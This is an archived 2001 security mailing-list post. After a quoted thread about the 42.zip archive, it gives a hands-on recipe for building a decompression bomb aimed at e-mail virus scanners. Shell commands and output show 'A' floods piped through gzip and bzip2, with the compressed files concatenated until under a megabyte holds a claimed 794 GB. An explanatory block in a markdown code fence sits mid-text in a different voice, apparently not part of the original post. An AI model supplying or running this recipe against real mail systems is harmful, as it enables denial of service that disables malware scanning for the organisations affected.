-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sun, 24 Jun 2001 bill_weissat_private wrote:

> Aycan Irican (aycanat_private) @ Sat, Jun 23, 2001 at 10:50:14AM +0300:
> >
> > On Thu, 21 Jun 2001, Robert Davidson Security wrote:
> >
> > > On Tue, Jun 19, 2001 at 08:53:54PM +0200, Michel Arboi wrote:
> > > > --- Markus 'FvD' Weber <fvdat_private> wrote:
> > > > > There is 42.zip out there, 42K total size, which consists of
> > > > > nested zips and, at the end, a 4GB file (IIRC 6 levels deep,
> > > > > each level 17 'wide') ... kills most email virus checkers.
> > > >
> > > > I did not know it existed. AltaVista found this on
> > > > http://www.hanau.net/fgk/downloads/42.zip
> > > >
> > > > Why is this kind of attack not more common? I suspect that most
> > > > filters are vulnerable, and yet they are not listed as such (e.g.
> > > > on SecurityFocus). And companies continue to use them.
> > >
> > > This used to be really common with BBSs back in their day. The idea
> > > back then was to take a 1GB file full of null characters, compress
> > > it, and upload it to the BBS. That way, when the BBS's virus
> > > scanner (which also uncompressed the file) attempted to check the
> > > archive for viruses, it would either 1) consume all disk space, or
> > > 2) keep the system busy for ages (some people ran 386s and 486s
> > > back then). The normal thing a user would do is upload the file and
> > > then hang up, which also leaves that dial-up line tied up while the
> > > virus scanner is checking the contents of the archive.
> > >
> > > --
> > > Regards,
> > > Robert Davidson.
> >
> > Oh yes, the old days... I used PCBoard on my BBS, and the PFED file
> > integrity checker could run any batch job when a line started with
> > '@'. It's an old vulnerability, I know.
> >
> > Maybe we should put a disk quota on the user that runs the virus
> > scanner thingy.
>
> There's a thought.
>
> Why not just use proc/mem limits to keep it from overrunning the box?
> Sure, email delivery time goes to hell, but it could fork off other jobs,
> do the massive compress thing slowly.

Some text that I wrote tonight... Of course, a proc/mem limit is a solution.

# Making a present for ENTERPRISE E-MAIL VIRUS SCANNERS.
# By Aycan Irican (a.k.a. FiXxXeR)
# aycanat_private
#
# Viruses in e-mail are a well-known problem today. The simplest approach is
# to use an e-mail virus scanner like Sophos, AMaViS, Inflex, etc. But if
# misconfigured, these tools can be very dangerous. Think of a compressed
# file that contains billions and billions of A's. We can easily create a
# file like that and compress it with well-known compression tools. Voila :)
#
# There are numerous methods that could be used to create such a file, but
# most are time-consuming and eat storage. Let me introduce my approach.
#
# An updated version of this text may (or may not) be found at
# http://mars.prosoft.com.tr/

First, I don't want to create a truly HUGE file on disk. Instead, I want to
use a pipe.

[fixxxer@uranus alientech]$ perl -e 'print "A"x1000000000' | gzip -f | dd of=file1
Out of memory!
0+1 records in
0+1 records out

Hmzz... great. I have 256 MB of RAM and that ate all of it...

[fixxxer@uranus alientech]$ free
             total       used       free     shared    buffers     cached
Mem:        255624     155652      99972       2068       4648     100860
-/+ buffers/cache:      50144     205480
Swap:       308200      75804     232396

OK, don't panic. I can find another, smarter way...

[fixxxer@uranus alientech]$ perl -e 'print "A"x10' | gzip -f | dd of=file1
0+1 records in
0+1 records out
[fixxxer@uranus alientech]$ perl -e 'print "B"x10' | gzip -f | dd of=file2
0+1 records in
0+1 records out
[fixxxer@uranus alientech]$ ls -al
total 16
drwxrwxr-x    2 fixxxer  fixxxer      4096 Jun 24 23:28 .
drwx------   35 fixxxer  fixxxer      4096 Jun 24 23:16 ..
-rw-rw-r--    1 fixxxer  fixxxer        23 Jun 24 23:28 file1
-rw-rw-r--    1 fixxxer  fixxxer        23 Jun 24 23:28 file2
[fixxxer@uranus alientech]$ cat file2 >> file1
[fixxxer@uranus alientech]$ zcat file1
AAAAAAAAAABBBBBBBBBB[fixxxer@uranus alientech]$

That's good. I can concatenate gzipped files, and it doesn't eat memory :)
So I must find the maximum number of bytes that I can pipe into gzip.

[fixxxer@uranus alientech]$ perl -e 'print "A"x450000000' | gzip -f | dd of=file1
853+1 records in
853+1 records out

That's enough for now. But what about other compression tools? Can we use
bzip2? :)

[fixxxer@uranus alientech]$ perl -e 'print "A"x10' | bzip2 -f | dd of=file1
0+1 records in
0+1 records out
[fixxxer@uranus alientech]$ perl -e 'print "B"x10' | bzip2 -f | dd of=file2
0+1 records in
0+1 records out
[fixxxer@uranus alientech]$ ls -al
total 16
drwxrwxr-x    2 fixxxer  fixxxer      4096 Jun 24 23:47 .
drwx------   35 fixxxer  fixxxer      4096 Jun 24 23:45 ..
-rw-rw-r--    1 fixxxer  fixxxer        39 Jun 24 23:47 file1
-rw-rw-r--    1 fixxxer  fixxxer        39 Jun 24 23:47 file2
[fixxxer@uranus alientech]$ bzcat file1
AAAAAAAAAABBBBBBBBBB[fixxxer@uranus alientech]$

That's good :) Let's compare gzip and bzip2.

[fixxxer@uranus alientech]$ perl -e 'print "A"x45000000' | bzip2 -9 -f | dd of=file1
0+1 records in
0+1 records out
[fixxxer@uranus alientech]$ perl -e 'print "A"x45000000' | gzip -9 -f | dd of=file2
85+1 records in
85+1 records out
[fixxxer@uranus alientech]$ ls -al
drwxrwxr-x    2 fixxxer  fixxxer      4096 Jun 24 23:51 .
drwx------   35 fixxxer  fixxxer      4096 Jun 24 23:45 ..
-rw-rw-r--    1 fixxxer  fixxxer        50 Jun 24 23:50 file1
-rw-rw-r--    1 fixxxer  fixxxer     43703 Jun 24 23:51 file2

Hmm... bzip2 uses a different algorithm, but gzip is used everywhere.
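The concatenation trick shown above can be reproduced in a few lines (the
filenames here are illustrative, not from the original session). It works
because a gzip file is a sequence of independent members, so appending one
valid .gz file to another still yields a valid .gz file, and decompression
emits both payloads back to back:

```shell
# gzip output is a stream of "members"; concatenating two valid .gz
# files produces one valid .gz file whose decompressed output is the
# concatenation of the two payloads.
printf 'AAAAAAAAAA' | gzip -c > part1.gz
printf 'BBBBBBBBBB' | gzip -c > part2.gz
cat part2.gz >> part1.gz        # part1.gz is still a valid gzip file
gzip -dc part1.gz               # prints AAAAAAAAAABBBBBBBBBB
```

This is the property the whole attack rests on: the compressed file grows
linearly while the decompressed payload grows just as fast, so a tiny,
highly redundant seed keeps its enormous compression ratio no matter how
many times it is appended to itself.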
I don't know which scanners are compatible with bzip2 (any ideas?)... No
problem, I can append some bzip2 data to my last HUGE file :)

Let's start the real work:

[fixxxer@uranus alientech]$ /usr/bin/time \
> -v perl -e 'print "A"x450000000' | gzip -9 -f | dd of=file2.gz
        Command being timed: "perl -e print "A"x450000000"
        User time (seconds): 1.85
        System time (seconds): 7.65
        Percent of CPU this job got: 9%
        Elapsed (wall clock) time (h:mm:ss or m:ss): 1:41.27
        Average shared text size (kbytes): 0
        Average unshared data size (kbytes): 0
        Average stack size (kbytes): 0
        Average total size (kbytes): 0
        Maximum resident set size (kbytes): 0
        Average resident set size (kbytes): 0
        Major (requiring I/O) page faults: 4395
        Minor (reclaiming a frame) page faults: 167543
        Voluntary context switches: 0
        Involuntary context switches: 0
        Swaps: 0
        File system inputs: 0
        File system outputs: 0
        Socket messages sent: 0
        Socket messages received: 0
        Signals delivered: 0
        Page size (bytes): 4096
        Exit status: 0
853+1 records in
853+1 records out
[fixxxer@uranus alientech]$ /usr/bin/time -v \
> perl -e 'print "A"x400000000' | bzip2 -9 -f | dd of=file1.bz2
        Command being timed: "perl -e print "A"x400000000"
        User time (seconds): 1.48
        System time (seconds): 5.49
        Percent of CPU this job got: 5%
        Elapsed (wall clock) time (h:mm:ss or m:ss): 2:06.35
        Average shared text size (kbytes): 0
        Average unshared data size (kbytes): 0
        Average stack size (kbytes): 0
        Average total size (kbytes): 0
        Maximum resident set size (kbytes): 0
        Average resident set size (kbytes): 0
        Major (requiring I/O) page faults: 4203
        Minor (reclaiming a frame) page faults: 155279
        Voluntary context switches: 0
        Involuntary context switches: 0
        Swaps: 0
        File system inputs: 0
        File system outputs: 0
        Socket messages sent: 0
        Socket messages received: 0
        Signals delivered: 0
        Page size (bytes): 4096
        Exit status: 0
0+1 records in
0+1 records out

And you really want to see the results :) OK, here is the ls output:

[fixxxer@uranus alientech]$ ls -al
total 444
drwxrwxr-x    2 fixxxer  fixxxer      4096 Jun 25 00:07 .
drwx------   35 fixxxer  fixxxer      4096 Jun 24 23:45 ..
-rw-rw-r--    1 fixxxer  fixxxer       333 Jun 25 00:09 file1.bz2
-rw-rw-r--    1 fixxxer  fixxxer    436765 Jun 25 00:02 file2.gz

Let's copy to a temp file and concatenate the files in a loop...
...bla ...bla ...bla

[fixxxer@uranus alientech]$ ls -al
total 792
drwxrwxr-x    2 fixxxer  fixxxer      4096 Jun 25 00:18 .
drwx------   35 fixxxer  fixxxer      4096 Jun 24 23:45 ..
-rw-rw-r--    1 fixxxer  fixxxer    354978 Jun 25 00:14 file1.bz2
-rw-rw-r--    1 fixxxer  fixxxer    436765 Jun 25 00:02 file2.gz
[fixxxer@uranus alientech]$ echo "400000000*354978/333/(1024^3)" | bc
397

400000000 is the number of bytes I pumped into the pipe.
354978    is the final .bz2 file size.
333       is the initial .bz2 file size.
(1024^3)  is the conversion factor from bytes to gigabytes.

I have 397 GigaBytes of DATA, I have 397 GigaBytes of DATA,
I have 397 GigaBytes of DATA :)

[fixxxer@uranus alientech]$ cp file1.bz2 file2.bz2
[fixxxer@uranus alientech]$ cat file2.bz2 >> file1.bz2

Oops, I have 794 gigs now :)

-rw-rw-r--    1 fixxxer  fixxxer    709956 Jun 25 00:28 file1.bz2

I think virus scanners have a problem :)

Imagination Limitless...

Aycan Irican

[fixxxer@uranus alientech]$ date
Mon Jun 25 00:30:11 EEST 2001

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: Made with pgp4pine 1.76

iD8DBQE7NmA/KkmbCdcOSYwRArlMAJ0S8jBQ4TMuhcHrIIh5Ozk03aJvQQCfZCHa
JURIWc5+4pFKf1nea4CtkrA=
=nukX
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 20:29:46 PDT